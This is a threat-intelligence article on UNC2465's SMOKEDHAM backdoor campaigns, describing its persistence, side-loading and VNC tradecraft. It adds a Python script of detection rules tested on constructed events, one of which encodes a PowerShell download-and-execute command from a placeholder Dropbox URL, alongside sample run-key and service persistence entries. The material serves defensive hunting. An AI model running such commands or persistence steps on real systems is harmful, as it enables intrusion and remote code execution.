CyberSecurity SEE

Unveiling the Use of SMOKEDHAM as a Deceptive Tactic Through Google Drive and Dropbox


Financially motivated threat actor UNC2465 has been utilizing the SMOKEDHAM backdoor to infiltrate target networks, with initial access often gained through phishing emails, trojanized software, or supply chain attacks. This group focuses on achieving persistence and lateral movement once inside the network, using various tools and techniques to carry out their malicious activities.

In the reconnaissance phase, UNC2465 leverages tools like Advanced IP Scanner and BloodHound to gather valuable information about the target network. For lateral movement, the threat actor employs RDP (Remote Desktop Protocol), while credential harvesting is carried out using Mimikatz. These tools enable the attacker to navigate through the network and escalate their privileges, furthering their goals.

Historically, UNC2465 has deployed DARKSIDE and LOCKBIT ransomware in their operations. However, recent campaigns suggest a shift towards using other ransomware families. The distribution of the SMOKEDHAM backdoor has been central to these operations, with malvertising and compromised software being common vectors for spreading the malware.

To establish persistence and stage additional files, the threat actor uses an NSIS installer script that performs several key functions. The script first checks for marker files and registry values so that it does not run a second time on an already-infected host; it then creates working folders, downloads archives, and extracts a mix of legitimate and malicious tools from them. By writing registry keys and configuring system services, the attacker ensures that the malicious payload is launched at startup with elevated privileges.

A batch script that launches obfuscated PowerShell is used to download and execute a malicious .NET payload from a C2 server, which initiates communication with the attacker's infrastructure. The kautix2aeX payload, written in .NET, polls the C2 server for commands and executes them on the infected system. Its capabilities include reconnaissance, taking screenshots, uploading and downloading files, and injecting its own code into memory for execution.

The actor signs its droppers with Extended Validation (EV) code-signing certificates; the signed executables carry additional files, including malicious DLLs that contain embedded PowerShell commands. Side-loading is the delivery trick: a malicious DLL is placed next to a legitimate signed binary such as oleview.exe, which loads it by name from its own directory, so the hidden script runs under the cover of a trusted Microsoft program and is less likely to be flagged. Persistence is achieved through several mechanisms, including copying files to new locations, modifying registry entries, and querying external resources as a diversion.

In one instance, the SMOKEDHAM actor ran systeminfo and directory-listing commands to gather system information, then downloaded a PowerShell script via a Dropbox link. That script downloaded additional files, likely a renamed VNC server masquerading as winlogon.exe together with a VNC configuration file, to establish a remote connection to a server controlled by the attacker. Running UltraVNC over port 443 shows that the attacker wanted interactive remote access, with the traffic blending into ordinary HTTPS, and positions them for further privilege escalation.
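As an added example (not code from the original article or from the actor's toolset), the following Python script turns the behaviours described in the four preceding paragraphs into hunting rules and runs them over a handful of constructed Sysmon-style events: run-key and service persistence from an installer drop folder, an obfuscated (-EncodedCommand) PowerShell download from a file-sharing host, oleview.exe loading a DLL from outside C:\Windows, and a winlogon.exe outside System32 connecting out on port 443. The event layout, every file path, service and registry value name, DLL name and the Dropbox URL are invented stand-ins for illustration; only the host names, port and binary names come from the text above.

```python
"""Hunting rules for the SMOKEDHAM tradecraft described above, run over constructed events."""
import base64
import re

# Constructed sample events, loosely modelled on Sysmon event IDs 1 (process create),
# 3 (network connect), 7 (image load) and 13 (registry value set). None of these paths,
# names or the URL are real indicators; they are stand-ins for the behaviours in the text.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString("
    "'https://www.dropbox.com/s/abc123/update.ps1?dl=1')".encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    # batch script launching obfuscated PowerShell that pulls a stage from Dropbox
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -ec {_ENCODED}"},
    # Run-key persistence pointing at a user-writable drop folder (hypothetical value name)
    {"id": 13, "image": r"C:\Users\victim\AppData\Local\Temp\setup.exe",
     "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\victim\AppData\Roaming\Updater\run.bat"},
    # service configured to start a payload from ProgramData (hypothetical service name)
    {"id": 1, "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc.exe create UpdaterSvc binPath= "C:\ProgramData\svc\updater.exe" start= auto'},
    # oleview.exe loading a DLL from its own drop directory (side-loading; DLL name invented)
    {"id": 7, "image": r"C:\ProgramData\tools\oleview.exe",
     "loaded": r"C:\ProgramData\tools\helper.dll"},
    # renamed VNC server posing as winlogon.exe, outbound on 443
    {"id": 3, "image": r"C:\ProgramData\vnc\winlogon.exe", "dst_port": 443},
    # benign controls that must not fire
    {"id": 3, "image": r"C:\Windows\System32\winlogon.exe", "dst_port": 443},
    {"id": 7, "image": r"C:\Windows\System32\oleview.exe",
     "loaded": r"C:\Windows\System32\ole32.dll"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Users\\Public)\\", re.I)
ENC_FLAG = re.compile(r"\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
STAGING_HOSTS = ("dropbox.com", "drive.google.com", "docs.google.com")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script (base64 of UTF-16LE) or None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def rule_encoded_powershell_download(ev):
    """Encoded PowerShell whose decoded body fetches from a file-sharing host."""
    if ev["id"] != 1 or "powershell" not in ev["image"].lower():
        return False
    script = decode_encoded_command(ev.get("cmdline", ""))
    if script is None:
        return False
    s = script.lower()
    return any(h in s for h in STAGING_HOSTS) or "downloadstring" in s or "downloadfile" in s


def rule_run_key_persistence(ev):
    """Run/RunOnce value whose data points into a user-writable directory."""
    return (ev["id"] == 13
            and re.search(r"\\CurrentVersion\\Run(Once)?\\", ev.get("target", ""), re.I) is not None
            and USER_WRITABLE.search(ev.get("details", "")) is not None)


def rule_service_persistence(ev):
    """sc.exe creating a service whose binPath lives outside protected system folders."""
    if ev["id"] != 1 or not ev["image"].lower().endswith(r"\sc.exe"):
        return False
    cmd = ev.get("cmdline", "")
    m = re.search(r'binpath=\s*"?([^"]+)', cmd, re.I)
    return " create " in cmd.lower() and m is not None and USER_WRITABLE.search(m.group(1)) is not None


def rule_oleview_sideload(ev):
    """oleview.exe (a signed Microsoft tool) loading a DLL from outside C:\\Windows."""
    return (ev["id"] == 7 and ev["image"].lower().endswith(r"\oleview.exe")
            and not ev.get("loaded", "").lower().startswith("c:\\windows\\"))


def rule_masquerading_winlogon_c2(ev):
    """A winlogon.exe outside System32 making an outbound 443 connection (renamed VNC)."""
    img = ev["image"].lower()
    return (ev["id"] == 3 and img.endswith(r"\winlogon.exe")
            and not img.startswith("c:\\windows\\system32\\") and ev.get("dst_port") == 443)


RULES = {
    "encoded_powershell_download": rule_encoded_powershell_download,
    "run_key_persistence": rule_run_key_persistence,
    "service_persistence": rule_service_persistence,
    "oleview_sideload": rule_oleview_sideload,
    "masquerading_winlogon_c2": rule_masquerading_winlogon_c2,
}


def hunt(events):
    """Return (rule_name, event_index) pairs for every event a rule fires on."""
    return [(name, i) for i, ev in enumerate(events) for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, idx in hunt(SAMPLE_EVENTS):
        print(f"{name}: event {idx} -> {SAMPLE_EVENTS[idx]['image']}")
```

The three benign control events exist to keep the rules honest: the real winlogon.exe talks on 443 routinely, oleview.exe loads plenty of system DLLs, and most PowerShell on a Windows estate is not encoded, so each rule keys on the combination the article describes (a location outside the system folders plus the suspicious action) rather than on the binary name alone.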

Overall, UNC2465’s operations showcase a sophisticated and persistent threat to organizations, highlighting the need for robust cybersecurity measures to defend against such adversaries. By understanding their tactics, techniques, and procedures, defenders can better safeguard their networks and mitigate the risks posed by financially motivated threat actors like UNC2465.

